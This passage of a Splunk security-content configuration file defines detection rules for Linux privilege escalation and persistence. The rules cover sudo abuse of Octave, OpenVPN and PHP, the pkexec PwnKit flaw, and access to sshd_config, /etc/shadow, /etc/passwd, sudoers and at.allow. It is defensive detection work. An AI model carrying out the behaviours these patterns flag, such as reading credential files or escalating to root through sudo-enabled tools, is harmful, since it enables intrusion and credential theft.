action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 20}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 20}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 20}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Octave Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 40, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*octave-cli*" AND Processes.process="*--eval*" AND Processes.process="*system*" AND Processes.process="*sudo*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_octave_privilege_escalation_filter` [ESCU - Linux OpenVPN Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = OpenVPN is a virtual private network system that implements techniques to create secure point-to-point or site-to-site connections in routed or bridged configurations and remote access facilities. It implements both client and server applications. If sudo right is given to the OpenVPN application for the user, then the user can run system commands as root and possibly get a root shell. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = OpenVPN is a virtual private network system that implements techniques to create secure point-to-point or site-to-site connections in routed or bridged configurations and remote access facilities. It implements both client and server applications. If sudo right is given to the OpenVPN application for the user, then the user can run system commands as root and possibly get a root shell. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present, filter as needed. action.escu.creation_date = 2022-08-11 action.escu.modification_date = 2022-08-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux OpenVPN Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 30}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 30}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 30}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux OpenVPN Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*openvpn*" AND Processes.process="*--dev*" AND Processes.process="*--script-security*" AND Processes.process="*--up*" AND Processes.process="*sudo*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_openvpn_privilege_escalation_filter` [ESCU - Linux Persistence and Privilege Escalation Risk Behavior - Rule] action.escu = 0 action.escu.enabled = 1 description = The following correlation is specific to Linux persistence and privilege escalation tactics and is tied to two analytic stories and any Linux analytic tied to persistence and privilege escalation. These techniques often overlap with Persistence techniques, as OS features that let an adversary persist can execute in an elevated context. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Risk"] action.escu.eli5 = The following correlation is specific to Linux persistence and privilege escalation tactics and is tied to two analytic stories and any Linux analytic tied to persistence and privilege escalation. These techniques often overlap with Persistence techniques, as OS features that let an adversary persist can execute in an elevated context. action.escu.how_to_implement = Ensure Linux anomaly and TTP analytics are enabled. TTP may be set to Notables for point detections, anomaly should not be notables but risk generators. The correlation relies on more than x amount of distict detection names generated before generating a notable. Modify the value as needed. Default value is set to 4. This value may need to be increased based on activity in your environment. action.escu.known_false_positives = False positives will be present based on many factors. Tune the correlation as needed to reduce too many triggers. action.escu.creation_date = 2022-08-30 action.escu.modification_date = 2022-08-30 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Persistence and Privilege Escalation Risk Behavior - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - RIR - Linux Persistence and Privilege Escalation Risk Behavior - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548"], "nist": ["DE.AE"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following correlation is specific to Linux persistence and privilege escalation tactics and is tied to two analytic stories and any Linux analytic tied to persistence and privilege escalation. These techniques often overlap with Persistence techniques, as OS features that let an adversary persist can execute in an elevated context. action.notable.param.rule_title = RBA: Linux Persistence and Privilege Escalation Risk Behavior action.notable.param.security_domain = audit action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime sum(All_Risk.calculated_risk_score) as risk_score, count(All_Risk.calculated_risk_score) as risk_event_count, values(All_Risk.annotations.mitre_attack.mitre_tactic_id) as annotations.mitre_attack.mitre_tactic_id, dc(All_Risk.annotations.mitre_attack.mitre_tactic_id) as mitre_tactic_id_count, values(All_Risk.annotations.mitre_attack.mitre_technique_id) as annotations.mitre_attack.mitre_technique_id, dc(All_Risk.annotations.mitre_attack.mitre_technique_id) as mitre_technique_id_count, values(All_Risk.tag) as tag, values(source) as source, dc(source) as source_count from datamodel=Risk.All_Risk where (All_Risk.analyticstories IN ("Linux Privilege Escalation", "Linux Persistence Techniques") OR source = "*Linux*") All_Risk.annotations.mitre_attack.mitre_tactic IN ("persistence", "privilege-escalation") All_Risk.risk_object_type="system" by All_Risk.risk_object All_Risk.risk_object_type All_Risk.annotations.mitre_attack.mitre_tactic | `drop_dm_object_name(All_Risk)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | where source_count >= 4 | `linux_persistence_and_privilege_escalation_risk_behavior_filter` [ESCU - Linux PHP Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = PHP is a general-purpose scripting language geared toward web development. It was originally created by Danish-Canadian programmer Rasmus Lerdorf in 1994. The PHP reference implementation is now produced by The PHP Group. If sudo right is given to php application for the user, then the user can run system commands as root and possibly get a root shell. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = PHP is a general-purpose scripting language geared toward web development. It was originally created by Danish-Canadian programmer Rasmus Lerdorf in 1994. The PHP reference implementation is now produced by The PHP Group. If sudo right is given to php application for the user, then the user can run system commands as root and possibly get a root shell. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present, filter as needed. action.escu.creation_date = 2022-08-09 action.escu.modification_date = 2022-08-09 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux PHP Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 30}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 30}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 30}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux PHP Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*php*-r*" AND Processes.process="*system*" AND Processes.process="*sudo*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_php_privilege_escalation_filter` [ESCU - Linux pkexec Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies `pkexec` spawning with no command-line arguments. A vulnerability in Polkit's pkexec component identified as CVE-2021-4034 (PwnKit) which is present in the default configuration of all major Linux distributions and can be exploited to gain full root privileges on the system. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1068"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies `pkexec` spawning with no command-line arguments. A vulnerability in Polkit's pkexec component identified as CVE-2021-4034 (PwnKit) which is present in the default configuration of all major Linux distributions and can be exploited to gain full root privileges on the system. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present, filter as needed. action.escu.creation_date = 2022-01-28 action.escu.modification_date = 2022-01-28 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux pkexec Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ related to a local privilege escalation in polkit pkexec. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 56}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux pkexec Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 70, "cve": ["CVE-2021-4034"], "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1068"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies `pkexec` spawning with no command-line arguments. A vulnerability in Polkit's pkexec component identified as CVE-2021-4034 (PwnKit) which is present in the default configuration of all major Linux distributions and can be exploited to gain full root privileges on the system. action.notable.param.rule_title = Linux pkexec Privilege Escalation action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_name=pkexec by _time Processes.dest Processes.user Processes.process_id Processes.parent_process_name Processes.process_name Processes.process Processes.process_path | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process="(^.{1}$)" | `linux_pkexec_privilege_escalation_filter` [ESCU - Linux Possible Access Or Modification Of sshd Config File - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to look for suspicious process command-line that might be accessing or modifying sshd_config. This file is the ssh configuration file that might be modify by threat actors or adversaries to redirect port connection, allow user using authorized key generated during attack. This anomaly detection might catch noise from administrator auditing or modifying ssh configuration file. In this scenario filter is needed action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098.004", "T1098"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to look for suspicious process command-line that might be accessing or modifying sshd_config. This file is the ssh configuration file that might be modify by threat actors or adversaries to redirect port connection, allow user using authorized key generated during attack. This anomaly detection might catch noise from administrator auditing or modifying ssh configuration file. In this scenario filter is needed action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrator or network operator can use this commandline for automation purposes. Please update the filter macros to remove false positives. action.escu.creation_date = 2022-01-11 action.escu.modification_date = 2022-01-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Possible Access Or Modification Of sshd Config File - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = a commandline $process$ executed on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Possible Access Or Modification Of sshd Config File - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098.004", "T1098"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name IN("cat", "nano*","vim*", "vi*") AND Processes.process IN("*/etc/ssh/sshd_config") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_possible_access_or_modification_of_sshd_config_file_filter` [ESCU - Linux Possible Access To Credential Files - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect a possible attempt to dump or access the content of /etc/passwd and /etc/shadow to enable offline credential cracking. "etc/passwd" store user information within linux OS while "etc/shadow" contain the user passwords hash. Adversaries and threat actors may attempt to access this to gain persistence and/or privilege escalation. This anomaly detection can be a good indicator of possible credential dumping technique but it might catch some normal administrator automation scripts or during credential auditing. In this scenario filter is needed. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.008", "T1003"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to detect a possible attempt to dump or access the content of /etc/passwd and /etc/shadow to enable offline credential cracking. "etc/passwd" store user information within linux OS while "etc/shadow" contain the user passwords hash. Adversaries and threat actors may attempt to access this to gain persistence and/or privilege escalation. This anomaly detection can be a good indicator of possible credential dumping technique but it might catch some normal administrator automation scripts or during credential auditing. In this scenario filter is needed. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrator or network operator can execute this command. Please update the filter macros to remove false positives. action.escu.creation_date = 2022-01-10 action.escu.modification_date = 2022-01-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Possible Access To Credential Files - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques"] action.risk = 1 action.risk.param._risk_message = A commandline $process$ executed on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Possible Access To Credential Files - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.008", "T1003"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name IN("cat", "nano*","vim*", "vi*") AND Processes.process IN("*/etc/shadow*", "*/etc/passwd*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_possible_access_to_credential_files_filter` [ESCU - Linux Possible Access To Sudoers File - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect a possible access or modification of /etc/sudoers file. "/etc/sudoers" file controls who can run what command as what users on what machine and can also control whether a specific user need a password for particular commands. adversaries and threat actors abuse this file to gain persistence and/or privilege escalation during attack on targeted host. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to detect a possible access or modification of /etc/sudoers file. "/etc/sudoers" file controls who can run what command as what users on what machine and can also control whether a specific user need a password for particular commands. adversaries and threat actors abuse this file to gain persistence and/or privilege escalation during attack on targeted host. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = administrator or network operator can execute this command. Please update the filter macros to remove false positives. action.escu.creation_date = 2022-01-10 action.escu.modification_date = 2022-01-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Possible Access To Sudoers File - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques"] action.risk = 1 action.risk.param._risk_message = A commandline $process$ executed on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Possible Access To Sudoers File - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name IN("cat", "nano*","vim*", "vi*") AND Processes.process IN("*/etc/sudoers*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_possible_access_to_sudoers_file_filter` [ESCU - Linux Possible Append Command To At Allow Config File - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic is designed to identify suspicious command lines that may append user entries to either /etc/at.allow or /etc/at.deny. These files can be exploited by malicious actors for persistence on a compromised Linux host by altering permissions for scheduled tasks using the at command.\ In this context, an attacker can create a user or add an existing user to these configuration files to execute their malicious code through scheduled tasks. The detection of such anomalous behavior can serve as an effective indicator warranting further investigation to validate if the activity is indeed malicious or a false positive. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.002", "T1053"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic is designed to identify suspicious command lines that may append user entries to either /etc/at.allow or /etc/at.deny. These files can be exploited by malicious actors for persistence on a compromised Linux host by altering permissions for scheduled tasks using the at command.\ In this context, an attacker can create a user or add an existing user to these configuration files to execute their malicious code through scheduled tasks. The detection of such anomalous behavior can serve as an effective indicator warranting further investigation to validate if the activity is indeed malicious or a false positive. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrator or network operator can use this commandline for automation purposes. Please update the filter macros to remove false positives. action.escu.creation_date = 2022-05-26 action.escu.modification_date = 2022-05-26 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Possible Append Command To At Allow Config File - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques", "Scheduled Tasks"] action.risk = 1 action.risk.param._risk_message = A commandline $process$ that may modify at allow config file in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 9}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Possible Append Command To At Allow Config File - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques", "Scheduled Tasks"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.002", "T1053"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count from datamodel=Endpoint.Processes where Processes.process = "*echo*" AND Processes.process IN("*/etc/at.allow", "*/etc/at.deny") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_possible_append_command_to_at_allow_config_file_filter` [ESCU - Linux Possible Append Command To Profile Config File - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for suspicious command-lines that can be possibly used to modify user profile files to automatically execute scripts/executables by shell upon reboot of the machine. This technique is commonly abused by adversaries, malware and red teamers as persistence mechanism to the targeted or compromised host. This Anomaly detection is a good indicator that someone wants to run code after reboot which can be done also by the administrator or network operator for automation purposes. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.004", "T1546"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for suspicious command-lines that can be possibly used to modify user profile files to automatically execute scripts/executables by shell upon reboot of the machine. This technique is commonly abused by adversaries, malware and red teamers as persistence mechanism to the targeted or compromised host. This Anomaly detection is a good indicator that someone wants to run code after reboot which can be done also by the administrator or network operator for automation purposes. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrator or network operator can use this commandline for automation purposes. Please update the filter macros to remove false positives. action.escu.creation_date = 2021-12-20 action.escu.modification_date = 2021-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Possible Append Command To Profile Config File - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon 